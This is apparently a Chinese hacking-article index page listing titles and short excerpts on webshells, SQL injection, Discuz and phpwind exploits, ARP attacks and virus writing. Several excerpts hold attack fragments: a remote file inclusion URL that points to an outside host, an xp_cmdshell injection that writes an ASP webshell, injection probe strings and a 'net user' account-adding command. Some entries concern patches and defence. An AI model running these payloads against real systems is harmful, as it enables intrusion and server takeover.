• 2014-01-18 23:39:08 如何追踪入侵者_黑客相关_脚本之家
• 在区域网路上可能你听过所谓「广播模式」的资料发送方法，此种方法不指定收信站，只要和此网路连结的所有网路设备皆为收信对象。但是这仅仅在区域网路上能够实行，因为区域网路上的机器不多(和Internet比起来)。如果想

• 2014-01-18 23:39:02 天意商务系统后台管理帐号破解html版_黑客相关_脚本之家
• /** 慈勤强 http://blog.csdn.net/cqq */ 自从上次写了个天意商务系统破解程序之后， 收到了不少朋友的来信， 有询问程序原理的，有询问如何防护的。 今天，我抽了一点时间，做了这个Html版，就只有这一个htm文件 相信有点html

• 2014-01-18 23:39:02 详解BMP木马_黑客相关_脚本之家
• 首先说明这不是什么新的东西,但最近有人说我们没有,那就随便写编文章放上来了,大家自己试验一下. 何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK

• 2014-01-18 23:39:01 风讯4.0未公开Bug_黑客相关_脚本之家
• 补充一句，这个东西只是看代码时随便看到的一处，其他地方还多着呢，当时写下来还没测试，我就记了下来，其中有什么不对，还望理解。哈哈~
  
  前段时间网上流行的SQL注入是利用伪造代理IP来实施攻击，这个HTTP_X_FORWARDED_FOR在一

• 2014-01-18 23:39:01 黑客入侵Windows XP系统常用七大招数_黑客相关_脚本之家
• 本文讲述了黑客入侵Windows XP操作系统常用的七种方法，如果大家遇到类似那可要注意了…… 　　第一招:屏幕保护 　　在Windows中启用了屏幕保护之后，只要我们离开计算机(或者不操作计算机)的时间达到预设的时间，系统就

• 2014-01-18 23:39:00 discuz许愿池插件远程包含漏洞_黑客相关_脚本之家
• 许愿池插件的wish.php文件出的问题： require $discuz_root.'./include/discuzcode.func.php';
  
  手工利用方法： 远程包含漏洞，变量discuz_root过滤不严，利用方法： http://url/wish.php?discuz_root=http://www.neeao.com/x

• 2014-01-18 23:39:00 Discuz! 4.x SQL injection / admin credentials disclosure exploit_黑客相关_脚本之家
• 前段时间发过Discuz! 5.0.0 GBK版本的EXP 今天在CN.Tink那里看到的4.x的，我去原站转了过来，然后找了个Discuz! 4.1.0测试了一下，成功，看下面截图，Discuz! 5.0.0 GBK版本的那个EXP又许多朋友不知道怎么用，当时我说了下，还是有

• 2014-01-18 23:38:59 最详细的SQL注入相关的命令整理 (转)第1/2页_黑客相关_脚本之家
• 1、 用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</scrip

• 2014-01-18 23:38:59 防止电脑被他人控制_黑客相关_脚本之家
• 电脑黑客可以利用开放端口和弱口令甚至空口令漏洞侵入用户电脑。黑客可以通过QQ获取对方网段(或直接获取IP)，利用扫描工具(例如: Superscan、X-scan等)扫描用户计算机端口并获取IP，再运行客户端连接工具(例如:冰河2.2)

• 2014-01-18 23:38:53 当网站不允许上传asp cer cdx htr文件时的一个解决方法！_黑客相关_脚本之家
• 前些天向lcx大哥求教关于web上传的问题，说起利用stm来上传，还能执行程序，不解，就给我了一段代码： 见lcx大哥给的一段代码 说保存为stm或者shtml看看，运行如下:
  
  HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg,

• 2014-01-18 23:38:53 渗透中用openrowset搞shell的方法_黑客相关_脚本之家
• 渗透中用openrowset搞shell的方法 得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了. 联想到一个权限不是很高的命令openrowset,进行跨库服务器查询

• 2014-01-18 23:38:46 全面了解ASP注入方法 [收集总结]_黑客相关_脚本之家
• 1.判断是否有注入 ;and 1=1 ;and 1=2
  
  2.初步判断是否是mssql ;and user>0
  
  3.注入参数是字符 'and [查询条件] and ''='
  
  4.搜索时没过滤参数的 'and [查询条件] and '%25'='
  
  5.判断数据库系统 ;and (select

• 2014-01-18 23:38:46 PHPSHELL又出新东东啦！_黑客相关_脚本之家
• 描述:一款类似于Sqlrootkit.asp的Mysqlrootkit.php,借助Mysql的root帐号进行一些操作.运行环境是php,但是一切操作都是在你连接的Mysql主机上,可以是本机也可以远程功能:1 读取服务器上的文件 2 移动服务器上的文件 3

• 2014-01-18 23:38:45 新欢乐时光代码分析_黑客相关_脚本之家
• <% Dim InWhere, HtmlText, VbsText, DegreeSign, AppleObject, FSO, WsShell, WinPath, SubE, FinalyDisk
  
  Sub KJ_start() ' 初始化变量 KJSetDim() ' 初始化环境 KJCreateMilieu() ' 感染本

• 2014-01-18 23:38:45 网站中的隐形炸弹eWebEditor文件上传漏洞补丁_黑客相关_脚本之家
• 打开Upload.ASP文件
  
  找到下面代码: 复制代码 代码如下:<% sAllowExt = Replace(UCase(sAllowExt), "ASP", "") %> 改为: 复制代码 代码如下:<% sAllowExt = UCase(sAllowExt) Do While InStr(sAllowExt

• 2014-01-18 23:38:44 NET IIS暴绝对路径漏洞_黑客相关_脚本之家
• Title:Microsoft ASP.NET May Disclose Web Directory to Remote Users in Certain Cases Description: If the ASP.NET application does not filter the error message, the web directory information may be dis

• 2014-01-18 23:38:44 Serv-U得到管理员密码新招 (转)_黑客相关_脚本之家
• 有时候我们在获得WebShell后很高兴地用Serv-U的本地权限提升漏洞来实现完全控制肉鸡的目的，但总会出错。我们在WebShell输入的命令一般是这样的：
  D:/WEB/su.exe “net user 1 1 /add”
  很多情况下不能成功，一般会返回如

• 2014-01-18 23:38:42 Win32 下病毒设计入门详细说明_黑客相关_脚本之家
• 本文假定你对dos下的病毒和386PM有一定的了解。
  
  　　1、感染任何一个病毒都需要有寄主，把病毒代码加入寄主程序中（伴侣病毒除外）
  
  　　以下说明如何将病毒代码嵌入PE文件中，有关PE文件的结构请看以前的文章。 PE文件

• 2014-01-18 23:38:42 超全的webshell权限提升方法_黑客相关_脚本之家
• WEBSHELL权限提升技巧 c: d: e:..... C:/Documents and Settings/All Users/「开始」菜单/程序/ 看这里能不能跳转，我们从这里可以获取好多有用的信息比如Serv-U的路径， C:/Documents and Settings/All Users/Appli

• 2014-01-18 23:38:36 OBLOG4.0 OBLOG4.5漏洞利用分析_黑客相关_脚本之家
• 来源：Deepen Study
  
  漏洞文件：js.asp <% Dim oblog set oblog=new class_sys oblog.autoupdate=False oblog.start dim js_blogurl,n js_blogurl=Trim(oblog.CacheConfig(3)) n=CInt(Request(”n”)) if n=0 then n=1

• 2014-01-18 23:38:36 不错的一篇玩转arp的文章_黑客相关_脚本之家
• 以下讨论的机子有 一个要攻击的机子：10.5.4.178 硬件地址：52:54:4C:98:EE:2F 我的机子： :10.5.3.69 硬件地址：52:54:4C:98:ED:C5 网关： 10.5.0.3 硬件地址：00:90:26:3D:0C:F3 一台交换机另一端口的机子：10.5.3.3 硬件地址

• 2014-01-18 23:38:35 对错误，漏洞和exploits的说明_黑客相关_脚本之家
• 作者：Mark Vogels 翻译：黯魂[S.S.T]
  
  在这篇文档中，我将会试着为你提供一个对于错误，和由于那些错误而产生的漏洞以及它们的exploits的基本认识。那决不意味着能让你完全理解exploits和漏洞，但是能帮助你学会认识可能的

• 2014-01-18 23:38:35 phpwind Exp 漏洞利用_黑客相关_脚本之家
• 忘记什么时候我就拿到了,一直没发挥.由于某些原因一直没发出来,毕竟不是原创,现在有人帖出来了,我也放出来. 程序代码 <?php print_r("
  
  +------------------------------------------------------------------+

• 2014-01-18 23:38:34 如何成为一名黑客全系列说明第1/2页_黑客相关_脚本之家
• 什么是黑客？ Jargon File 包含了一大堆关于“hacker”这个词的定义，大部分与技术高超和热衷解决问题及超越极限 有关。但如果你只想知道如何 成为 一名黑客，那么只有两件事情确实相关。这可以追溯到几十年前第一 台分时

• 2014-01-18 23:38:34 XSS &amp; SQL注入_黑客相关_脚本之家
• XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X Web Security - XSS & more X XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 作者: CyberPhreak 翻译: 黯魂 [S.S.T]
  
  ~介绍
  
  在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇